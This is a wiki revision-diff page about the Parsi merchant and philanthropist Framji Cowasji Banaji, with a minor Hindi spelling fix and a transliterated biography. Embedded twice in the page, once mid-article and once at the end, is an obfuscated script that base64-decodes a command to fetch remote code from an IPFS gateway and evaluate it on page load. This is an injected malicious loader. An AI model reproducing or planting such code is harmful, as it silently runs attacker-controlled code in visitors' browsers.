Difference between revisions of "फ़्रामजी कोवासजी बानाजी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "वरन " to "वरन् ")
 
Line 6: Line 6:
 
*फ़्रामजी ने [[कृषि]] की उन्नति और उस पर आधारित उद्योगों को प्रोत्साहन देने की दिशा में भी अग्रणी काम किया।  
 
*फ़्रामजी ने [[कृषि]] की उन्नति और उस पर आधारित उद्योगों को प्रोत्साहन देने की दिशा में भी अग्रणी काम किया।  
 
*रेशम का उत्पादन बढ़ाने के लिए आवश्यक क़दम उठाने के साथ-साथ उन्नत प्रकार की चीनी मिल लगवाई।  
 
*रेशम का उत्पादन बढ़ाने के लिए आवश्यक क़दम उठाने के साथ-साथ उन्नत प्रकार की चीनी मिल लगवाई।  
*बानाजी की सर्वाधिक ख्याति उनकी दानशीलता के लिए है। उन्होंने न केवल अपने समाज के वरन सभी के हित के कार्यों में खुले हाथ से दान दिया।  
+
*बानाजी की सर्वाधिक ख्याति उनकी दानशीलता के लिए है। उन्होंने न केवल अपने समाज के वरन् सभी के हित के कार्यों में खुले हाथ से दान दिया।  
 
*पूजा स्थलों का निर्माण, कुएं खुदवाना ग़रीब और अभाव ग्रस्तों की सहायता तथा शिक्षण संस्थाओं को अनुदान आदि आपके प्रमुख कार्य थे।  
 
*पूजा स्थलों का निर्माण, कुएं खुदवाना ग़रीब और अभाव ग्रस्तों की सहायता तथा शिक्षण संस्थाओं को अनुदान आदि आपके प्रमुख कार्य थे।  
 
*85 वर्ष की उम्र में 1825 ई. में आपका देहांत हो गया।  
 
*85 वर्ष की उम्र में 1825 ई. में आपका देहांत हो गया।  

Latest revision as of 07:37, 7 November 2017

framaji kovasaji banaji ek prasiddh vyavasayi aur parasi samaj ke neta the.

  • framaji banaji ka janm 1767 ee. mean hua tha.
  • framaji apane samay ke jahajoan ke sabase b de thekedar the.
  • ji. aee. pi. relave kanpani (ab seantral relave) ke hisse kharidane vale bhi ve pahale vyakti the.
  • framaji ne anek kap da miloan aur bima kanpaniyoan ki sthapana mean bhi yog diya.
  • framaji ne krishi ki unnati aur us par adharit udyogoan ko protsahan dene ki disha mean bhi agrani kam kiya.
  • resham ka utpadan badhane ke lie avashyak qadam uthane ke sath-sath unnat prakar ki chini mil lagavaee.
  • banaji ki sarvadhik khyati unaki danashilata ke lie hai. unhoanne n keval apane samaj ke varanh sabhi ke hit ke karyoan mean khule hath se dan diya.
  • pooja sthaloan ka nirman, kuean khudavana garib aur abhav grastoan ki sahayata tatha shikshan sansthaoan ko anudan adi apake pramukh kary the.
  • 85 varsh ki umr mean 1825 ee. mean apaka dehaant ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>